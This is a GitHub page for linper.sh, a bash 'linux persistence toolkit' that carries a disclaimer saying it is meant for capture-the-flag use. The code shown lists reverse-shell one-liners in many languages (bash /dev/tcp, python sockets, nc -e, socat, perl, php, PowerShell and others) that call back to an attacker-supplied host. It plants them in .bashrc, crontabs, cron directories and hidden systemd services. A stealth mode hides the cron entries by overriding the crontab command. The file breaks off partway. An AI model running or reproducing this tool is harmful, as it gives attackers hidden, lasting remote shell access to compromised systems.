-
Notifications
You must be signed in to change notification settings - Fork 11
/
Copy pathlinper.sh
executable file
·650 lines (580 loc) · 33.4 KB
/
linper.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
#!/bin/bash
CLEAN=0
CLEANSYSMSG=0
COUNTER=0
CRON="* * * * *"
DISABLEBASHRC=0
DRYRUN=0
ENUM_DEF=0
VALIDSYNTAX=0
PRINTCOMMANDS=0
LIMIT=0
STEALTHMODE=0
TIMESTOMP=0
REMOVALTOOL=$(which srm) || REMOVALTOOL=$(which rm)
RANDOMPHPFILE=$(echo $(uuidgen 2> /dev/null).php) || RANDOMPHPFILE=$(echo $(grep -oa --color=never [qwertyuiooplkjhgfdsazxcvbnm1234567890] /dev/urandom | head -n 20 | tr -d '\n').php)
RANDOMCRONFILE=$(echo $(uuidgen 2> /dev/null)) || RANDOMCRONFILE=$(echo $(grep -oa --color=never [qwertyuiooplkjhgfdsazxcvbnm1234567890] /dev/urandom | head -n 20 | tr -d '\n'))
RANDOMPORT=$(expr 1024 + $RANDOM)
SHELL="/bin/bash"
SERVICEFILE=$(echo $(uuidgen 2> /dev/null).service) || SERVICEFILE=$(echo $(grep -oa --color=never [qwertyuiooplkjhgfdsazxcvbnm1234567890] /dev/urandom | head -n 20 | tr -d '\n').service)
SERVICESHELLSCRIPT=$(echo $(uuidgen 2> /dev/null).sh) || SERVICESHELLSCRIPT=$(echo $(grep -oa --color=never [qwertyuiooplkjhgfdsazxcvbnm1234567890] /dev/urandom | head -n 20 | tr -d '\n').sh)
CRONDFILE=$(echo $(uuidgen 2> /dev/null | tr -d '-')) || CRONDFILE=$(echo $(grep -oa --color=never [qwertyuiooplkjhgfdsazxcvbnm1234567890] /dev/urandom | head -n 20 | tr -d '\n'))
INFO="linux persistence toolkit\n\nadvisory: this was developed with ctfs in mind and that is its intended use case. please do not use this tool in an unethical or illegal manner.\n"
HELP="\e[33m-h, --help\e[0m show this message
\e[33m--examples\e[0m print example commands
\e[33m-d, --dryrun\e[0m enumerate binaries only (if ran with -i and -c it will enumerate modifications made by this program)
\e[33m--print\e[0m print commands used to install persitence (assumes -d)
\e[33m-e, --enum-defenses\e[0m try to enumerate any defenses relevant to installing reverse shells
\e[33m-i, --rhost\e[0m IP/domain to call back to
\e[33m-p, --rport\e[0m port to call back to
\e[33m-l, --limit\e[0m number of reverse shells to install (default: all)
\e[33m--cron\e[0m cron schedule for any reverse shells executed by crontab (default: every minute)
\e[33m-c, --clean\e[0m removes any reverse shells installed by this program for the given RHOST
\e[33m-s, --stealth-mode\e[0m various trivial modifications in an attempt to hide the backdoors from humans
\e[33m-w, --writable-dir\e[0m set the directory to install any temporary files (default: checks /dev/shm, /tmp, and /var/tmp)"
EXAMPLES="Examples:
\e[33mPrint\e[0m Commands that can be used to install persistence (assumes -d): bash linper.sh -i 192.168.1.2 -p 4444 --print
\e[33mEnumerate\e[0m binaries that can be used for persistence: bash linper.sh -d
\e[33mEnumerate\e[0m defenses: bash linper.sh -e
\e[33mEnumerate\e[0m reverse shells and other modifications to the file system made by this program: bash linper.sh -i 192.168.1.2 -c -d
\e[33mInstall\e[0m persistence (default cron & noisy): bash linper.sh -i 192.168.1.2 -p 4444
\e[33mInstall\e[0m only 3 reverse shells: bash linper.sh -i 192.168.1.2 -p 4444 -l 3
\e[33mInstall\e[0m persistence (custom cron & stealthy): bash linper.sh -i 192.168.1.2 -p 4444 --cron \"* * * 2 3\" -s
\e[33mInstall\e[0m persistence with supplied directory for temporary files: bash linper.sh -i 192.168.1.2 -p 4444 -w /tmp/i/do/not/exist
\e[33mRemove\e[0m persistence for 192.168.1.2: bash linper.sh -i 192.168.1.2 -c"
while test $# -gt 0;
do
case "$1" in
-h|--help)
echo -e "$INFO"
echo -e "$HELP"
exit ;;
--examples)
echo -e "$EXAMPLES"
exit ;;
-d|--dryrun)
shift
DRYRUN=1 ;;
--cron)
shift
export CRON=$1
shift ;;
-s|--stealth-mode)
shift
STEALTHMODE=1 ;;
-i|--rhost)
shift
if test $# -gt 0;
then
export RHOST=$1
fi
shift ;;
-p|--rport)
shift
if test $# -gt 0;
then
export RPORT=$1
fi
shift ;;
-l|--limit)
shift
if test $# -gt 0
then
export LIMIT=$1
fi
shift ;;
-c|--clean)
CLEAN=1
shift ;;
-e|--enum-defenses)
shift
ENUM_DEF=1 ;;
-w|--writable-dir)
shift
WRITABLE_DIR="$1"
shift ;;
--print)
PRINTCOMMANDS=1
DRYRUN=1
shift ;;
esac
done
invalid_syntax_exit() {
echo -e "$INFO"
echo -e "$HELP"
exit
}
syntax_checker() {
if [ "$CLEAN" -eq 1 ] && $(echo "$RHOST" | grep -qi "[a-zA-Z0-9]" 2> /dev/null);
then
:
elif [ "$DRYRUN" -eq 1 ]
then
:
elif [ "$ENUM_DEF" -eq 1 ];
then
:
elif [ "$DRYRUN" -eq 0 ] && $(echo "$RHOST" | grep -qi "[a-zA-Z0-9]" 2> /dev/null) && $(echo "$RPORT" | grep -qi "[a-zA-Z0-9]" 2> /dev/null);
then
:
else
invalid_syntax_exit
fi
}
limit_checker() {
if test $1 -eq $LIMIT;
then
echo "-----------------------"
echo -e "\e[92m[+]\e[0m Installed $LIMIT reverse shells; exiting"
echo "-----------------------"
exit
fi
}
stealth_modifications() {
if $(echo $RHOST | grep -qP "^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$");
then
local a b c d ip=$RHOST
IFS=. read -r a b c d <<< "$ip"
export RHOST_DECIMAL=$((a * 256 ** 3 + b * 256 ** 2 + c * 256 + d))
unset IFS
if [ $RHOST_DECIMAL -eq 0 ];
then
RHOST_DECIMAL="0.0.0.0"
fi
fi
DISABLEBASHRC=1
TIMESTOMP=1
SERVICEFILE=$(echo /etc/systemd/system/.$(uuidgen 2> /dev/null).service) || SERVICEFILE=$(echo /etc/systemd/system/.$(grep -oa --color=never [qwertyuiooplkjhgfdsazxcvbnm1234567890] /dev/urandom | head -n 20 | tr -d '\n').service)
SERVICESHELLSCRIPT=$(echo /etc/systemd/system/.$(uuidgen 2> /dev/null)) || SERVICESHELLSCRIPT=$(echo /etc/systemd/system/.$(grep -oa --color=never [qwertyuiooplkjhgfdsazxcvbnm1234567890] /dev/urandom | head -n 20 | tr -d '\n'))
CRONDFILE=.$(echo $(uuidgen 2> /dev/null | tr -d '-')) || CRONDFILE=.$(echo $(grep -oa --color=never [qwertyuiooplkjhgfdsazxcvbnm1234567890] /dev/urandom | head -n 20 | tr -d '\n'))
echo 'function crontab () { #linpercrontab
REALBIN="$(which crontab)" #linpercrontab
if $(echo "$1" | grep -qi "\-l"); #linpercrontab
then #linpercrontab
if [ `$REALBIN -l | grep -v "'$RHOST'" | grep -v "'$RPORT'" | wc -l` -eq 0 ]; #linpercrontab
then #linpercrontab
echo no crontab for $(whoami) #linpercrontab
else #linpercrontab
$REALBIN -l | grep -v "'$RHOST'" | grep -v "'$RPORT'" #linpercrontab
fi #linpercrontab
elif $(echo "$1" | grep -qi "\-r"); #linpercrontab
then #linpercrontab
if $($REALBIN -l | grep "'$RHOST'" | grep -qi "'$RPORT'"); #linpercrontab
then #linpercrontab
$REALBIN -l | grep --color=never "'$RHOST'" | grep --color=never "'$RPORT'" | crontab #linpercrontab
else #linpercrontab
$REALBIN -r #linpercrontab
fi #linpercrontab
else #linpercrontab
$REALBIN "${@:1}" #linpercrontab
fi #linpercrontab
} #linpercrontab' >> ~/.bashrc && echo -e "\e[92m[+]\e[0m --stealth-mode modificaitons complete" && echo "-----------------------"
}
find_writable() {
echo -e "\e[92m[+]\e[0m Searching for writable directory to store temporary files"
if [ -z ${WRITABLE_DIR+x} ];
then
export WRITABLE_DIR=$(find /dev/shm /var/tmp /tmp -type d -writable 2> /dev/null | grep --color=never -o -e '^/dev/shm$' -e '^/var/tmp$' -e '^/tmp$' | head -n 1)
else
if [ $WRITABLE_DIR = "." ];
then
export WRITABLE_DIR=$(pwd)
fi
export WRITABLE_DIR=$(find $WRITABLE_DIR -type d -writable 2> /dev/null | head -n 1)
fi
TMPTEST=$WRITABLE_DIR/$(uuidgen 2> /dev/null) || TMPTEST=$WRITABLE_DIR/$(grep -oa --color=never [qwertyuiooplkjhgfdsazxcvbnm1234567890] /dev/urandom | head -n 20 | tr -d '\n')
(touch $TMPTEST && $REMOVALTOOL $TMPTEST) 2> /dev/null || (echo -e "\e[91m[-]\e[0m Error: Could not find a writable directory for temporary files" && echo -e "\e[93m[!]\e[0m Action: You can force one with -w, --writable-dir" && echo -e "\e[91m[-]\e[0m Killing Process" && kill -9 $$)
echo -e "\e[92m[+]\e[0m Choosing $WRITABLE_DIR"
echo "-----------------------"
export TMPCRON=$(echo $WRITABLE_DIR/$(uuidgen 2> /dev/null)) || TMPCRON=$(echo $WRITABLE_DIR/$(grep -oa --color=never [qwertyuiooplkjhgfdsazxcvbnm1234567890] /dev/urandom | head -n 20 | tr -d '\n'))
export TMPCRONWITHPAYLOAD=$(echo $WRITABLE_DIR/$(uuidgen 2> /dev/null)) || TMPCRONWITHPAYLOAD=$(echo $WRITABLE_DIR/$(grep -oa --color=never [qwertyuiooplkjhgfdsazxcvbnm1234567890] /dev/urandom | head -n 20 | tr -d '\n'))
export TMPJJSFILE=$(echo $WRITABLE_DIR/$(uuidgen 2> /dev/null)) || TMPJJSFILE=$(echo $WRITABLE_DIR/$(grep -oa --color=never [qwertyuiooplkjhgfdsazxcvbnm1234567890] /dev/urandom | head -n 20 | tr -d '\n'))
export SUDOPASSWORDFILE=$(echo $WRITABLE_DIR/$(uuidgen 2> /dev/null)) || SUDOPASSWORDFILE=$(echo $WRITABLE_DIR/$(grep -oa --color=never [qwertyuiooplkjhgfdsazxcvbnm1234567890] /dev/urandom | head -n 20 | tr -d '\n'))
export TMPRCLOCAL=$(echo $WRITABLE_DIR/$(uuidgen 2> /dev/null)) || TMPRCLOCAL=$(echo $WRITABLE_DIR/$(grep -oa --color=never [qwertyuiooplkjhgfdsazxcvbnm1234567890] /dev/urandom | head -n 20 | tr -d '\n'))
export TMPGOFILE=$(echo $WRITABLE_DIR/$(uuidgen 2> /dev/null).go) || TMPGOFILE=$(echo $WRITABLE_DIR/$(grep -oa --color=never [qwertyuiooplkjhgfdsazxcvbnm1234567890] /dev/urandom | head -n 20 | tr -d '\n'))
export PIPDIR=$(echo $WRITABLE_DIR/$(uuidgen 2> /dev/null)) || PIPDIR=$(echo $WRITABLE_DIR/$(grep -oa --color=never [qwertyuiooplkjhgfdsazxcvbnm1234567890] /dev/urandom | head -n 20 | tr -d '\n'))
export PIP3DIR=$(echo $WRITABLE_DIR/$(uuidgen 2> /dev/null)) || PIP3DIR=$(echo $WRITABLE_DIR/$(grep -oa --color=never [qwertyuiooplkjhgfdsazxcvbnm1234567890] /dev/urandom | head -n 20 | tr -d '\n'))
export EASYINSTALLDIR=$(echo $WRITABLE_DIR/$(uuidgen 2> /dev/null)) || EASYINSTALLDIR=$(echo $WRITABLE_DIR/$(grep -oa --color=never [qwertyuiooplkjhgfdsazxcvbnm1234567890] /dev/urandom | head -n 20 | tr -d '\n'))
}
remove_writable() {
$REMOVALTOOL $TMPCRON 2> /dev/null
$REMOVALTOOL $TMPCRONWITHPAYLOAD 2> /dev/null
$REMOVALTOOL $TMPJJSFILE 2> /dev/null
$REMOVALTOOL $SUDOPASSWORDFILE 2> /dev/null
$REMOVALTOOL $TMPRCLOCAL 2> /dev/null
$REMOVALTOOL $TMPGOFILE 2> /dev/null
$REMOVALTOOL -r $PIPDIR 2> /dev/null
$REMOVALTOOL -r $PIP3DIR 2> /dev/null
$REMOVALTOOL -r $EASYINSTALLDIR 2> /dev/null
echo -e "\e[92m[+]\e[0m Removed Temporary Files"
}
set_methods(){
export METHODS=(
"awk , awk --version , awk 'BEGIN {s = \\\"/inet/tcp/0/$RHOST/$RPORT\\\"; while(42) { do{ printf \\\"shell>\\\" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print \\\$0 |& s; close(c); } } while(c != \\\"exit\\\") close(s); }}' /dev/null?"
"bash , bash -c 'exit' , bash -c 'bash -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1'?"
"easy_install , mkdir $EASYINSTALLDIR && echo 'import sys,socket,os,pty;exit()' > $EASYINSTALLDIR/setup.py; easy_install $EASYINSTALLDIR 2> /dev/null &> /dev/null , mkdir $EASYINSTALLDIR; echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"$RHOST\\\",$RPORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"$SHELL\\\",\\\"-i\\\"]);' > $EASYINSTALLDIR/setup.py; easy_install $EASYINSTALLDIR?"
"gdb , gdb -nx -ex 'python import sys,socket,os,pty;exit()' &> /dev/null , echo 'c' | gdb -nx -ex 'python import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"$RHOST\\\",$RPORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"$SHELL\\\",\\\"-i\\\"]);' -ex quit &> /dev/null?"
"go , echo 'package main;import\"os\";func main() { os.Exit(0) };' > $TMPGOFILE && go run $TMPGOFILE , echo 'package main;import\\\"os/exec\\\";import\\\"net\\\";func main(){c,_:=net.Dial(\\\"tcp\\\",\\\"$RHOST:$RPORT\\\");cmd:=exec.Command(\\\"$SHELL\\\");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > $TMPGOFILE && go run $TMPGOFILE?"
"irb , echo \\\"require 'socket'\\\" | irb --noecho --noverbose , echo \\\"require 'socket'; exit if fork;c=TCPSocket.new('$RHOST',$RPORT);while(cmd=c.gets);IO.popen(cmd,'r'){|io|c.print io.read} end\\\" | irb --noecho --noverbose?"
"jrunscript , jrunscript -e 'exit();' , jrunscript -e 'var host=\\\"$RHOST\\\"; var port=$RPORT;var p=new java.lang.ProcessBuilder(\\\"$SHELL\\\", \\\"-i\\\").redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'?"
"jjs , echo \"quit()\" > $TMPJJSFILE && jjs $TMPJJSFILE , echo 'var ProcessBuilder = Java.type(\\\"java.lang.ProcessBuilder\\\");var p=new ProcessBuilder(\\\"$SHELL\\\", \\\"-i\\\").redirectErrorStream(true).start();var Socket = Java.type(\\\"java.net.Socket\\\");var s=new Socket(\\\"$RHOST\\\",$RPORT);var pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){ while(pi.available()>0)so.write(pi.read()); while(pe.available()>0)so.write(pe.read()); while(si.available()>0)po.write(si.read()); so.flush();po.flush(); Java.type(\\\"java.lang.Thread\\\").sleep(50); try {p.exitValue();break;}catch (e){}};p.destroy();s.close();' | jjs?"
"ksh , ksh -c 'exit' , ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1'?"
"lua , lua -e 'local var' , lua -e 'local host, port = \\\"$RHOST\\\", $RPORT local socket = require(\\\"socket\\\") local tcp = socket.tcp() local io = require(\\\"io\\\") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, \\\"r\\\") local s = f:read(\\\"*a\\\") f:close() tcp:send(s) if status == \\\"closed\\\" then break end end tcp:close()'?"
"lua5.3 , lua -e 'local var' , lua5.3 -e 'local host, port = \\\"$RHOST\\\", $RPORT local socket = require(\\\"socket\\\") local tcp = socket.tcp() local io = require(\\\"io\\\") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, \\\"r\\\") local s = f:read(\\\"*a\\\") f:close() tcp:send(s) if status == \\\"closed\\\" then break end end tcp:close()'?"
"nc , nc -w 1 -lnvp $RANDOMPORT &> /dev/null & nc 0.0.0.0 $RANDOMPORT &> /dev/null , nc $RHOST $RPORT -e $SHELL?"
"node , node -e \"process.exit(0)\" , node -e \\\"sh = require(\\\\\\\"child_process\\\\\\\").spawn(\\\\\\\"$SHELL\\\\\\\");net.connect($RPORT, \\\\\\\"$RHOST\\\\\\\", function () {this.pipe(sh.stdin);sh.stdout.pipe(this);sh.stderr.pipe(this);});\\\"?"
"perl , perl -e \"use Socket;\" , perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\\"tcp\\\"));if(connect(S,sockaddr_in($RPORT,inet_aton(\\\"$RHOST\\\")))){open(STDIN,\\\"\>\&S\\\");open(STDOUT,\\\"\>\&S\\\");open(STDERR,\\\"\>\&S\\\");exec(\\\"$SHELL -i\\\");};'?"
"php , php -r 'exit();' , php -r \\\"exec(\\\\\\\"$SHELL -c '$SHELL -i >& /dev/tcp/$RHOST/$RPORT 0>&1'\\\\\\\");\\\"?"
"php7.4 , php7.4 -r 'exit();' , php7.4 -r \\\"exec(\\\\\\\"$SHELL -c '$SHELL -i >& /dev/tcp/$RHOST/$RPORT 0>&1'\\\\\\\");\\\"?"
"pwsh , pwsh -command 'exit' , pwsh -command '\\\$client = New-Object System.Net.Sockets.TCPClient(\\\"$RHOST\\\",$RPORT);\\\$stream = \\\$client.GetStream();[byte[]]\\\$bytes = 0..65535|%{0};while((\\\$i = \\\$stream.Read(\\\$bytes, 0, \\\$bytes.Length)) -ne 0){;\\\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\\\$bytes,0, \\\$i);\\\$sendback = (iex \\\$data 2>&1 | Out-String );\\\$sendback2 = \\\$sendback + \\\"# \\\";\\\$sendbyte = ([text.encoding]::ASCII).GetBytes(\\\$sendback2);\\\$stream.Write(\\\$sendbyte,0,\\\$sendbyte.Length);\\\$stream.Flush()};\\\$client.Close()'?"
"pip , mkdir $PIPDIR; echo 'import socket,subprocess,os;exit()' > $PIPDIR/setup.py; pip install $PIPDIR 2>&1 | grep -qi 'ERROR: No .egg-info directory found in' , mkdir $PIPDIR; echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"$RHOST\\\",$RPORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"$SHELL\\\",\\\"-i\\\"]);' > $PIPDIR/setup.py; pip install $PIPDIR?"
"pip3 , mkdir $PIP3DIR && echo 'import socket,subprocess,os;exit()' > $PIP3DIR/setup.py; pip3 install $PIP3DIR 2>&1 | grep -qi 'ERROR: No .egg-info directory found in' , mkdir $PIP3DIR; echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"$RHOST\\\",$RPORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"$SHELL\\\",\\\"-i\\\"]);' > $PIP3DIR/setup.py; pip3 install $PIP3DIR?"
"python , python -c 'import socket,subprocess,os;exit()' , python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"$RHOST\\\",$RPORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"$SHELL\\\",\\\"-i\\\"]);'?"
"python2 , python2 -c 'import socket,subprocess,os;exit()' , python2 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"$RHOST\\\",$RPORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"$SHELL\\\",\\\"-i\\\"]);'?"
"python2.7 , python2.7 -c 'import socket,subprocess,os;exit()' , python2.7 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"$RHOST\\\",$RPORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"$SHELL\\\",\\\"-i\\\"]);'?"
"python3 , python3 -c 'import socket,subprocess,os;exit()' , python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"$RHOST\\\",$RPORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"$SHELL\\\",\\\"-i\\\"]);'?"
"python3.8 , python3.8 -c 'import socket,subprocess,os;exit()' , python3.8 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"$RHOST\\\",$RPORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"$SHELL\\\",\\\"-i\\\"]);'?"
"ruby , ruby -rsocket -e 'exit' , ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\\\"'$RHOST'\\\",'$RPORT');while(cmd=c.gets);IO.popen(cmd,\\\"r\\\"){|io|c.print io.read}end'?"
"socat , socat tcp-listen:$RANDOMPORT STDOUT & echo exit | socat -t 1 STDIN tcp-connect:0.0.0.0:$RANDOMPORT , socat tcp-connect:$RHOST:$RPORT exec:$SHELL,pty,stderr,setsid,sigint,sane?"
"telnet , echo quit | telnet , TELNETNAMEDPIPE=\\\$(echo $WRITABLE_DIR/$(uuidgen 2> /dev/null || grep -oa --color=never [qwertyuiooplkjhgfdsazxcvbnm1234567890] /dev/urandom | head -n 20 | tr -d '\n');mkfifo \\\$TELNETNAMEDPIPE && telnet $RHOST $RPORT 2> /dev/null 0<\\\$TELNETNAMEDPIPE | $SHELL 1>\\\$TELNETNAMEDPIPE 2> /dev/null & sleep .0001 #?"
)
}
enum_methods() {
IFS="?"
for s in ${METHODS[@]};
do
METHOD=$(echo $s | awk -F ' , ' '{print $1}')
EVAL_STATEMENT=$(echo $s | awk -F ' , ' '{print $2}')
PAYLOAD=$(echo $s | awk -F ' , ' '{print $3}')
if $(echo $METHOD | grep -qi "[a-z]")
then
echo "$EVAL_STATEMENT" | $SHELL 2> /dev/null 1>&2
if [ $? -eq 0 ];
then
echo -e "\e[92m[+]\e[0m Method Found: $METHOD"
enum_doors $METHOD $PAYLOAD
fi
fi
done
}
enum_doors() {
DOORS=(
"$HOME/.bashrc , if test -f $HOME/.bashrc; then touch $HOME/.bashrc; else touch $HOME/.bashrc && $HOME/.bashrc; fi , echo \"$PAYLOAD 2> /dev/null 1>&2 & sleep .0001\" >> $HOME/.bashrc?"
"/var/spool/cron/crontabs/$(whoami) , crontab -l > $TMPCRON; echo \"* * * * * echo linper\" >> $TMPCRON; crontab $TMPCRON; crontab -l > $TMPCRON; cat $TMPCRON | grep -v linper > $TMPCRONWITHPAYLOAD; crontab $TMPCRONWITHPAYLOAD; if grep -qi [A-Za-z0-9] $TMPCRONWITHPAYLOAD; then crontab $TMPCRONWITHPAYLOAD; else crontab -r; fi; grep linper -qi $TMPCRON , echo \"$CRON $PAYLOAD\" >> $TMPCRONWITHPAYLOAD; crontab $TMPCRONWITHPAYLOAD && chmod +x $TMPCRONWITHPAYLOAD?"
"/etc/crontab , find /etc/ -type f -name crontab -writable | grep -qi crontab , echo \"$CRON $(whoami) $PAYLOAD\" >> /etc/crontab?"
"/etc/cron.d/ , find /etc/cron.d/ -type d -writable | head -n 1 | grep cron 2> /dev/null 1>&2 , echo \"$CRON $(whoami) $PAYLOAD\" >> /etc/cron.d/$CRONDFILE?"
"/etc/cron.hourly/ , find /etc/cron.hourly/ -type d -writable 2> /dev/null | head -n 1 | grep -q hourly , if head -n 1 /etc/cron.hourly/$RANDOMCRONFILE | grep -q '#!/bin/bash'; then echo \"$PAYLOAD\" >> /etc/cron.hourly/$RANDOMCRONFILE; else echo \"#!/bin/bash\" > /etc/cron.hourly/$RANDOMCRONFILE; echo \"$PAYLOAD\" >> /etc/cron.hourly/$RANDOMCRONFILE; chmod +x /etc/cron.hourly/$RANDOMCRONFILE?"
"/etc/cron.daily/ , find /etc/cron.daily/ -type d -writable 2> /dev/null | head -n 1 | grep -q daily , if head -n 1 /etc/cron.daily/$RANDOMCRONFILE | grep -q '#!/bin/bash'; then echo \"$PAYLOAD\" >> /etc/cron.daily/$RANDOMCRONFILE; else echo \"#!/bin/bash\" > /etc/cron.daily/$RANDOMCRONFILE; echo \"$PAYLOAD\" >> /etc/cron.daily/$RANDOMCRONFILE; chmod +x /etc/cron.daily/$RANDOMCRONFILE?"
"/etc/cron.weekly/ , find /etc/cron.weekly/ -type d -writable 2> /dev/null | head -n 1 | grep -q weekly , if head -n 1 /etc/cron.weekly/$RANDOMCRONFILE | grep -q '#!/bin/bash'; then echo \"$PAYLOAD\" >> /etc/cron.weekly/$RANDOMCRONFILE; else echo \"#!/bin/bash\" > /etc/cron.weekly/$RANDOMCRONFILE; echo \"$PAYLOAD\" >> /etc/cron.weekly/$RANDOMCRONFILE; chmod +x /etc/cron.weekly/$RANDOMCRONFILE?"
"/etc/cron.monthly/ , find /etc/cron.monthly/ -type d -writable 2> /dev/null | head -n 1 | grep -q monthly , if head -n 1 /etc/cron.monthly/$RANDOMCRONFILE | grep -q '#!/bin/bash'; then echo \"$PAYLOAD\" >> /etc/cron.monthly/$RANDOMCRONFILE; else echo \"#!/bin/bash\" > /etc/cron.monthly/$RANDOMCRONFILE; echo \"$PAYLOAD\" >> /etc/cron.monthly/$RANDOMCRONFILE; chmod +x /etc/cron.monthly/$RANDOMCRONFILE?"
"/etc/systemd/ , find /etc/systemd/ -type d -writable | head -n 1 | grep -qi systemd , echo \"$PAYLOAD\" >> /etc/systemd/system/$SERVICESHELLSCRIPT; if test -f /etc/systemd/system/$SERVICEFILE; then echo > /dev/null; else touch /etc/systemd/system/$SERVICEFILE; echo \"[Service]\" >> /etc/systemd/system/$SERVICEFILE; echo \"Type=oneshot\" >> /etc/systemd/system/$SERVICEFILE; echo \"ExecStartPre=$(which sleep) 60\" >> /etc/systemd/system/$SERVICEFILE; echo \"ExecStart=$(which $SHELL) /etc/systemd/system/$SERVICESHELLSCRIPT\" >> /etc/systemd/system/$SERVICEFILE; echo \"ExecStartPost=$(which sleep) infinity\" >> /etc/systemd/system/$SERVICEFILE; echo \"[Install]\" >> /etc/systemd/system/$SERVICEFILE; echo \"WantedBy=multi-user.target\" >> /etc/systemd/system/$SERVICEFILE; chmod 644 /etc/systemd/system/$SERVICEFILE; systemctl start $SERVICEFILE 2> /dev/null & sleep .0001; systemctl enable $SERVICEFILE 2> /dev/null & sleep .0001; fi;?"
